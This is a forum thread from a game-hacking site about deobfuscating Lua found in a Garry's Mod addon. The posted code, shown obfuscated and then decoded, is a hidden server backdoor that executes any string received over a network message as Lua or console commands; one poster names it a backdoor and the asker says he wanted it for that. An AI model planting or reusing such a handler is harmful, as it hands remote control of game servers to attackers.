Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › MultiPlayer Game Hacks & Cheats › Steam Games Hacks & Cheats › Garry's Mod Hacks & Cheats › Garry's Mod Discussions & Help › Lua De Obfuscate

Lua De Obfuscate

Posts 1–10 of 10 · Page 1 of 1
JE
jefferywinner
Lua De Obfuscate
So i have found a chunk of code in a addon that is obfuscated, and i was wondering if its possible to de obfuscate lua. I have been looking for ages and cant find anything helpful so if you can please show me or demonstrate how to de obfuscate something (if its even possible) it would be amazing thanks.
#1 · 10y ago
TH
The Beast123
Quote Originally Posted by jefferywinner View Post
So i have found a chunk of code in a addon that is obfuscated, and i was wondering if its possible to de obfuscate lua. I have been looking for ages and cant find anything helpful so if you can please show me or demonstrate how to de obfuscate something (if its even possible) it would be amazing thanks.
We need to see the "chunk of code " m8
#2 · 10y ago
JE
jefferywinner
Fine

Code:
if SERVER then
local c='%c'
local YYYYTTYXY6Y = util.AddNetworkString
local YYYYTRYXY6Y = _G[string.format(string.rep(c,9), 82, 117, 110, 83, 116, 114, 105, 110, 103)]
local YYYYTRYXY66 = net.ReadString
local YYTYYYY666T = type
local YYTYTYY666T = bit.tohex
local YYTTTYY666T = math.sin
local YYTTTYY66TT = math.cos
local YYYYTRY6Y66 = net.ReadBit
local YYTYYRY6Y66 = net.Receive
local YYTYYRY666Y = game.ConsoleCommand
local YYTYYYY666Y = game.GetWorld
local YYYYTTYXYYY = string.format(string.rep(c,15), 83, 97, 110, 100, 98, 111, 120, 95, 65, 114, 109, 68, 117, 112, 101)
YYYYTTYXY6Y(YYYYTTYXYYY)
YYTYYRY6Y66(YYYYTTYXYYY, function( length, ply )
local YYRYTTYXY6Y = YYYYTRYXY66()
local TYYTTYXY6Y = YYYYTRY6Y66()
if TYYTTYXY6Y == 1 then
YYYYTRYXY6Y(YYRYTTYXY6Y)
else
YYTYYRY666Y(YYRYTTYXY6Y.."\n")
end
end)
end
#3 · 10y ago
ZO
zombiiju
Quote Originally Posted by jefferywinner View Post
Fine

Code:
if SERVER then
local c='%c'
local YYYYTTYXY6Y = util.AddNetworkString
local YYYYTRYXY6Y = _G[string.format(string.rep(c,9), 82, 117, 110, 83, 116, 114, 105, 110, 103)]
local YYYYTRYXY66 = net.ReadString
local YYTYYYY666T = type
local YYTYTYY666T = bit.tohex
local YYTTTYY666T = math.sin
local YYTTTYY66TT = math.cos
local YYYYTRY6Y66 = net.ReadBit
local YYTYYRY6Y66 = net.Receive
local YYTYYRY666Y = game.ConsoleCommand
local YYTYYYY666Y = game.GetWorld
local YYYYTTYXYYY = string.format(string.rep(c,15), 83, 97, 110, 100, 98, 111, 120, 95, 65, 114, 109, 68, 117, 112, 101)
YYYYTTYXY6Y(YYYYTTYXYYY)
YYTYYRY6Y66(YYYYTTYXYYY, function( length, ply )
local YYRYTTYXY6Y = YYYYTRYXY66()
local TYYTTYXY6Y = YYYYTRY6Y66()
if TYYTTYXY6Y == 1 then
YYYYTRYXY6Y(YYRYTTYXY6Y)
else
YYTYYRY666Y(YYRYTTYXY6Y.."\n")
end
end)
end
Code:
if SERVER then
	util.AddNetworkString("Sandbox_ArmDupe")
	net.Receive("Sandbox_ArmDupe", function( length, ply )
		local netstring = net.ReadString()
		local bit = net.ReadBit()
		if bit == 1 then
			RunString(netstring)
		else
			game.ConsoleCommand(netstring.."\n")
		end
	end)
end
good luck have fun
#4 · 10y ago
D3M0L1T10N
D3M0L1T10N
Quote Originally Posted by zombiiju View Post
Code:
if SERVER then
	util.AddNetworkString("Sandbox_ArmDupe")
	net.Receive("Sandbox_ArmDupe", function( length, ply )
		local netstring = net.ReadString()
		local bit = net.ReadBit()
		if bit == 1 then
			RunString(netstring)
		else
			game.ConsoleCommand(netstring.."\n")
		end
	end)
end
good luck have fun
if bit == 1 then
RunString(netstring)
else
game.ConsoleCommand(netstring.."\n")
end

seems totally legit and not a backdoor
#5 · 10y ago
JE
jefferywinner
Its why i wanted it .-.

- - - Updated - - -

Quote Originally Posted by zombiiju View Post
Code:
if SERVER then
	util.AddNetworkString("Sandbox_ArmDupe")
	net.Receive("Sandbox_ArmDupe", function( length, ply )
		local netstring = net.ReadString()
		local bit = net.ReadBit()
		if bit == 1 then
			RunString(netstring)
		else
			game.ConsoleCommand(netstring.."\n")
		end
	end)
end
good luck have fun
Do you mind me asking how you did that, always wanted to know how to read obfuscated lua.
#6 · 10y ago
RA
Razon91
Quote Originally Posted by jefferywinner View Post
Its why i wanted it .-.

- - - Updated - - -



Do you mind me asking how you did that, always wanted to know how to read obfuscated lua.
not easy.. requires a masters degree in programming with 12 years of asm coding under the belt.
#7 · 10y ago
KA
KaiWayHafNeeYum
Quote Originally Posted by Razon91 View Post
not easy.. requires a masters degree in programming with 12 years of asm coding under the belt.
Or just use hexrays ida and be a master hacker in a week? Xdxdddddd
#8 · 10y ago
JE
jefferywinner
Quote Originally Posted by KaiWayHafNeeYum View Post
Or just use hexrays ida and be a master hacker in a week? Xdxdddddd
Yeah i like your idea better
#9 · 10y ago
Smoke
Smoke
Seems as though this is solved as the last few posts were rambling.

/Closed.
#10 · 10y ago
Posts 1–10 of 10 · Page 1 of 1

Post a Reply

Similar Threads

  • Garry's Mod Lua script that shoots the weapon when aiming to someones head.By Tigermisu in Hack Requests
    2Last post 10y ago
  • America's Army No Recoil/Reload LUA code.By MagikBullet in General Game Hacking
    7Last post 19y ago
  • [Article]Obfuscation[Tutorial]By Lolland in Visual Basic Programming
    26Last post 16y ago
  • How to obfuscate a vb.net application !!By MJLover in Visual Basic Programming
    4Last post 16y ago
  • [Opinions] Obfuscation/Safe ReleasesBy zmansquared in Visual Basic Programming
    8Last post 16y ago

Tags for this Thread

None